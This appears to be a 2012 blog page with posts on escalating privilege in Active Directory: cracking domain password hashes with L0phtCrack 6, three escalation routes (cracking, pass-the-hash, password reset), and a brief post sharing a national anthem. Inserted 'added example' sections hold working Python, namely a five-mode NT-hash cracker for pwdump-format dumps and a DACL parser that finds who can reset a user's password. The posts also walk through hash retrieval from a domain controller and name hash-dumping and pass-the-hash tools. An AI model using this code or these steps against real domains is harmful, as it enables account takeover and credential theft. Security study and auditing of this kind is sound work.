Tuesday, July 24, 2012

Active Directory Security Privilege Escalation Using L0phtCrack 6

Hello!

In this post, we will look at the first way to escalate privilege in Active Directory, which is also the most difficult way to launch an Active Directory privilege escalation attack.

This way involves guessing the target user's password, or cracking it (cracking is the process of recovering a user's password from the form in which a computer stores or transmits it, i.e. from its hash).

Since most Active Directory deployments use basic protections such as account lockout, only amateurs use online password guessing as a means to obtain a domain user account's password. Also, because most AD deployments have basic auditing in place, amateurs who guess passwords are very likely to get caught in the act: each failed logon attempt is written to the domain controller's Security log.

So, since password guessing is not realistically an option in a decently protected Active Directory (and because it is for amateurs), I will skip it and talk about the more interesting approach: cracking a domain user account's password offline from its hash.

The main tool used for password cracking is L0phtCrack, now in version 6. L0phtCrack is primarily a password cracking tool and has five main ways in which it cracks passwords –

  1. Username Crack - L0phtCrack 6 checks whether any account uses its own username as its password. This check is performed in every audit.
  2. Dictionary Crack – L0phtCrack 6 tests every word in a specified dictionary file against the password hashes. The dictionary crack tries words up to 14 characters, which is the LM hash length limit (NT hashes have no such limit, so longer dictionary words are only useful against NT hashes).
  3. Hybrid Crack – L0phtCrack modifies the dictionary words to generate additional password attempts, i.e. dictionary words slightly altered with appended numbers and symbols, the way most users "strengthen" a word.
  4. Precomputed Crack – L0phtCrack compares the user password hashes with precomputed password hashes supplied in a hash file (a rainbow-table style lookup; it works only because LM and NT hashes are unsalted).
  5. Brute Force Crack - L0phtCrack tries every combination of the characters it is configured to use, up to the configured length.
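To make the five audit styles concrete, here is an added example (my own code, not L0phtCrack's and not from the original post) that re-implements each of them against NT hashes in Python. Because hashlib's MD4 is frequently unavailable, the block carries its own MD4; the NT hash is just MD4 over the UTF-16LE password with no salt, so each guess is hashed once and compared against every account in the dump at the same time. The dump is constructed: the hashes for jdoe and guest are the well-known published NT hashes of "password" and of the empty password, the others are generated from secrets chosen for the demo, and the LM column is the constant that means "no LM hash stored".

```python
"""Added example: the five L0phtCrack audit styles re-implemented against NT hashes."""
import itertools
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    rounds = (  # (mixing function, additive constant, shift schedule, message-word order)
        (lambda x, y, z: (x & y) | (~x & MASK & z), 0, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = [a, b, c, d]
        for fn, k, shifts, order in rounds:
            for i, w in enumerate(order):
                r = (-i) % 4  # register rewritten this step cycles a, d, c, b
                mixed = v[r] + fn(v[(r + 1) % 4], v[(r + 2) % 4], v[(r + 3) % 4]) + X[w] + k
                v[r] = _rotl(mixed & MASK, shifts[i % 4])
        a, b, c, d = ((s + t) & MASK for s, t in zip((a, b, c, d), v))
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE password): unsalted, case-sensitive, no 14-char cap (that cap is LM's)."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> dict:
    """Parse 'user:rid:lmhash:nthash:::' lines into {nthash: [users]}."""
    targets = {}
    for line in text.strip().splitlines():
        user, _rid, _lm, nt = line.split(":")[:4]
        targets.setdefault(nt.lower(), []).append(user)
    return targets


def crack(targets: dict, candidates) -> dict:
    """Hash each candidate once and look it up against every target (NT hashes carry no salt)."""
    found = {}
    for pw in candidates:
        for user in targets.get(nt_hash(pw), ()):
            found.setdefault(user, pw)
    return found


def username_candidates(targets):  # Username Crack
    for users in targets.values():
        for u in users:
            yield from (u, u.lower(), u.capitalize())


def hybrid_candidates(words):  # Hybrid Crack (suffix "" makes it a superset of the Dictionary Crack)
    for w in words:
        for base in (w, w.capitalize()):
            for suffix in ("", "1", "123", "!", "2012", "2012!"):
                yield base + suffix


def brute_candidates(charset, max_len):  # Brute Force Crack
    for n in range(1, max_len + 1):
        yield from ("".join(t) for t in itertools.product(charset, repeat=n))


def precomputed_crack(targets, table: dict) -> dict:
    """Precomputed Crack: table maps nthash -> password (stand-in for a rainbow table)."""
    return {u: pw for h, pw in table.items() for u in targets.get(h, ())}


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", i.e. no LM hash stored
# Constructed sample dump (not from any real domain): jdoe and guest carry the published NT
# hashes of "password" and ""; the other hashes are generated here from chosen demo secrets.
SAMPLE_DUMP = "\n".join([
    f"Administrator:500:{EMPTY_LM}:{nt_hash('Welcome2012!')}:::",
    f"jdoe:1105:{EMPTY_LM}:8846f7eaee8fb117ad06bdd830b7586c:::",
    f"backupsvc:1106:{EMPTY_LM}:{nt_hash('backupsvc')}:::",
    f"svc_legacy:1107:{EMPTY_LM}:{nt_hash('a1b')}:::",
    f"guest:501:{EMPTY_LM}:31d6cfe0d16ae931b73c59d7e0c089c0:::",
])


def run_audit(dump: str = SAMPLE_DUMP) -> dict:
    """Run the five styles in L0phtCrack's order and return {user: clear-text password}."""
    targets = parse_pwdump(dump)
    words = ["welcome", "password", "summer", "letmein"]
    found = {}
    found.update(crack(targets, username_candidates(targets)))
    found.update(crack(targets, words))
    found.update(crack(targets, hybrid_candidates(words)))
    found.update(precomputed_crack(targets, {"31d6cfe0d16ae931b73c59d7e0c089c0": ""}))
    found.update(crack(targets, brute_candidates("ab1", 3)))
    return found


if __name__ == "__main__":
    for user, pw in run_audit().items():
        print(f"{user}: {pw!r}")
```

Note what the example illustrates about the list above: the Precomputed crack is a plain lookup keyed by hash, which is only possible because LM and NT hashes are unsalted, and the 14-character limit quoted for the Dictionary crack is an LM artefact (LM splits the password into two 7-character halves); an NT hash of a longer password falls just as quickly if the password is in the word list.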

Using L0phtCrack for Active Directory Security Privilege Escalation

Now, for launching an Active Directory privilege escalation attack, L0phtCrack 6 can be used to recover the clear-text password of any domain user account, including those of Domain/Enterprise Admins; once you know such a password, you can log on as that account, and by doing so you have escalated your privilege in Active Directory.

But did you really escalate privilege? Or did you just show that you don't know much about Windows Security?

Here's what I mean: to use L0phtCrack 6 to crack domain user account passwords, you need administrative privileges on a Domain Controller (DC). But if you already have administrative privileges on a DC, you are already a God-like administrator, and if you don't know that, you don't know much about Windows security.

Note: L0phtCrack 6 has a new capability called Remote Password Retrieval, but if you read the documentation, it clearly states that a) you need administrator privileges on the remote Domain Controller, specifically the Debug privilege (SeDebugPrivilege, the right that lets the tool read the hashes out of the LSASS process), and b) the machine must also be remotely administrable.

Anyway, several default built-in groups in Active Directory, such as Server Operators, Backup Operators and Print Operators, already have administrative-equivalent privileges on Domain Controllers (each can log on to a DC, and Backup Operators, for example, can back up the NTDS.dit database that holds every password hash), so technically any member of any of these groups could use L0phtCrack to obtain the hashes and then get to the clear-text passwords.

But as I mentioned earlier, members of these groups already have enough power to become a Domain Admin; if they don't know that, that is their ignorance, and there is no greater risk than ignorant administrators who possess God-like privileges.

However, if someone has managed to get administrative access on a Domain Controller but has no idea that they already have God-like power, or no idea how to use it, then L0phtCrack can certainly help them find the password of a Domain Admin so that they can log on as one.

So, if you have managed to get administrative access on a Domain Controller and have no idea that you already have God-like powers, here is how to use L0phtCrack 6 to escalate your privilege in Active Directory –

How to Escalate Privilege in Active Directory by Using L0phtCrack

Step 1- Configure L0phtCrack Session Options

You should first specify the Session Options for L0phtCrack 6 to use.



I highly recommend referring to the product manual for the details, as these options determine how long the cracking process takes and which resources it uses.

Step 2 – Obtaining a copy of the Password Hashes from Active Directory

  1. Launch the L0phtCrack Wizard.
  2. If you are logged on to a DC, select Retrieve from the Local Machine; otherwise select Retrieve from a Remote Machine.
  3. Choose an auditing method. Select from Quick Password Audit, Common Password Audit, Strong Password Audit, or Custom.
  4. Pick a Reporting Style. Options include Display passwords when audited, Display encrypted password 'hashes', Display how long it took to audit each password, Display auditing method, and Make visible notification when auditing is done.

Step 3 – Cracking Active Directory Domain User Account Password Hashes

  1. Click Finish to begin cracking the Active Directory domain user account password hashes.


That is all you need to do. Once L0phtCrack 6 has finished, if everything goes well, you should see the password(s) of one or more Domain Admins in your Active Directory.

Once you know the password of a Domain Admin account, you can use it to log on as that Domain Admin. Once logged on as a Domain Admin, what you do with that power is limited only by your expertise. (Some of our comrades can bring an entire network down in minutes.)

There are other tools available as well, such as John the Ripper (a password cracker) and pwdump7 (a hash dumper rather than a cracker; it extracts the hashes that a cracker consumes), but they all require administrative privileges on the machine holding the hashes to begin with, so strictly speaking they cannot be used to elevate privilege in Active Directory or Windows.


L0phtCrack Download, Trial and Additional Info

For additional information and to download a free L0phtCrack 6 trial, see the vendor's website.

In the next post, we'll see a real way to escalate privilege in Active Directory: by using password hashes directly.

Thanks

Tuesday, July 10, 2012

3 Primary Ways to Escalate Privilege in Active Directory

Hello!

In this post, we will look at the 3 primary ways to escalate privilege in Active Directory. (In posts to follow, I will cover each of these in detail.)

Before you begin to escalate privilege, you identify the target of your attack, i.e. the Active Directory (domain) user account whose identity you wish to compromise.

The objective of a privilege escalation attack is to elevate your privilege from that of your account to that of another account, usually one that has more power (elevated privileges) than yours. This domain user account can be that of a colleague, a delegated Active Directory administrator (e.g. a Help Desk analyst) or a Domain/Enterprise Administrator.

To accomplish this, the primary method of attack is to steal the identity of the target domain user account. In other words, all 3 primary ways to escalate privilege in Active Directory involve stealing a corporate user's identity, since their domain user account is essentially their identity.

So, the 3 ways to escalate privilege in Active Directory are –
1. Guessing (or cracking) the target user's password, then logging on with that password
2. Obtaining the user's password hash and then passing the hash to impersonate the user
3. Resetting the user's password, then logging on with the new password

The 3 ways above are listed in decreasing order of effort required.

So the hardest way is to guess a target user's password and the easiest is to reset it, even though tools (l0phtcrack) make the actual guessing (cracking) effort easy.

The second way falls in between: it takes less time than guessing passwords, but it requires access to a machine on which the target user has logged on. Once you have access to such a machine, there are tools available (lslsass64.exe) that can find the user's hashes in LSASS memory, and others (runhash64.exe) that let you authenticate with them without ever knowing the password.

Resetting a user's password is the easiest method, but also the least known and least used, because the hard part of this approach is not the reset itself but finding out who can reset the target user's password.

Finding out who can reset the password of a domain user account is generally a very difficult task (it means working out the effective permissions on the user object, across every ACE, inherited or explicit, and every nested group), and it is this difficulty that has deterred use of this attack vector. But these days, just as there is at least one tool to help brute-force passwords (l0phtcrack), there is also a tool to easily find out who can reset whose passwords in an Active Directory environment. The availability of such a tool now makes it very easy for anyone to find out who can reset whose passwords, use that information to reset a target user's password, and then log on as the target user, in effect successfully escalating privilege in Active Directory.
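The post does not name the tool, so as an added example (my own code, not the author's and not any vendor's product) here is the core of that check for one user object: read its security descriptor in SDDL form, which is what PowerShell's `(Get-Acl "AD:\<user DN>").Sddl` or `dsacls` hands you, and list every trustee whose ACEs grant a password reset. The two GUIDs are the real User-Force-Change-Password ("Reset Password") and User-Change-Password control-access rights from the AD schema; the sample descriptor, its S-1-5-21 SIDs and the group names attached to them are constructed for the demo.

```python
"""Added example: who can reset a given user's password, read from the object's DACL in SDDL."""
import re

# Control-access-right GUIDs from the AD schema (rightsGuid of the controlAccessRight objects).
RESET_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"   # User-Force-Change-Password ("Reset Password")
CHANGE_PASSWORD = "ab721a53-1e2f-11d0-9819-00aa0040529b"  # User-Change-Password (requires the old password)

# SDDL aliases for the well-known trustees used below; real DACLs mostly carry raw S-1-5-21-... SIDs.
SID_ALIASES = {"DA": "Domain Admins", "AO": "Account Operators", "PS": "Principal Self",
               "AU": "Authenticated Users", "SY": "SYSTEM", "WD": "Everyone"}

ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[^;]*);"
                    r"(?P<object>[0-9a-fA-F-]*);(?P<inherit>[0-9a-fA-F-]*);(?P<sid>[^)]+)\)")


def _rights(field: str) -> set:
    """Access-rights field as a set of two-letter SDDL codes; accepts the hex mask form too."""
    if field.startswith("0x"):
        mask = int(field, 16)
        bits = (("GA", 0x10000000), ("CR", 0x100), ("WD", 0x40000), ("WO", 0x80000))
        return {code for code, bit in bits if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def who_can_reset(sddl: str) -> dict:
    """Return {trustee: why} for every trustee whose ACEs on this user object permit a
    password reset: GenericAll, unscoped CR (all extended rights) or CR scoped to
    User-Force-Change-Password. A deny ACE for the same trustee removes it again."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)  # the DACL: flags, then the ACE list
    if not m:
        raise ValueError("no DACL in descriptor")
    allowed, denied = {}, set()
    for ace in ACE_RE.finditer(m.group(1)):
        rights, obj = _rights(ace["rights"]), ace["object"].lower()
        if "GA" in rights:
            why = "GenericAll"
        elif "CR" in rights and obj in ("", RESET_PASSWORD):
            why = "all extended rights" if obj == "" else "Reset Password"
        else:
            continue  # e.g. CR scoped to CHANGE_PASSWORD, or plain read rights
        trustee = SID_ALIASES.get(ace["sid"], ace["sid"])
        if ace["type"] in ("D", "OD"):
            denied.add(trustee)
        elif ace["type"] in ("A", "OA"):
            allowed.setdefault(trustee, why)
    return {t: why for t, why in allowed.items() if t not in denied}


# Constructed sample descriptor for one user object (not from a real domain; the S-1-5-21 SIDs are made up).
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    f"(OD;;CR;{RESET_PASSWORD};;S-1-5-21-1111-2222-3333-1107)"  # contractor: explicit deny, listed first
    "(A;;GA;;;DA)"                                                # Domain Admins: GenericAll
    f"(OA;;CR;{CHANGE_PASSWORD};;PS)"                             # the user may change (not reset) own password
    f"(OA;;CR;{RESET_PASSWORD};;S-1-5-21-1111-2222-3333-1105)"  # help-desk group: delegated Reset Password
    f"(OA;;CR;{RESET_PASSWORD};;S-1-5-21-1111-2222-3333-1107)"  # contractor: allow, overridden by the deny
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AO)"                        # Account Operators: default full control
    "(A;;LCRPLORC;;;AU)"                                          # Authenticated Users: read only
)


if __name__ == "__main__":
    for trustee, why in who_can_reset(SAMPLE_SDDL).items():
        print(f"{trustee}: {why}")
```

Two caveats a practitioner should keep in mind. First, the trustees returned are usually groups, so the real answer is the transitive membership of each of them; the help-desk group above may contain nested groups that were never meant to reset Domain Admin passwords. Second, the function only reports rights that exist now: a trustee holding WD (WRITE_DAC) or WO (WRITE_OWNER) on the object can grant itself Reset Password at will, and a tool that answers "who can reset whose passwords" has to count those as well.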

In the next 3 posts, we will see in detail how to use each of these three methods to escalate privilege in Active Directory, with an analysis of how much effort each approach involves, which tools are required, and other helpful details.

Thanks

Tuesday, July 3, 2012

National Anthem of the Russian Federation

Hello!

Today, as Americans celebrate July 4, I too feel proud of my country, so I thought I would share our great national anthem (with translation) with you.



More on privilege escalation in Active Directory in the next post.

Thanks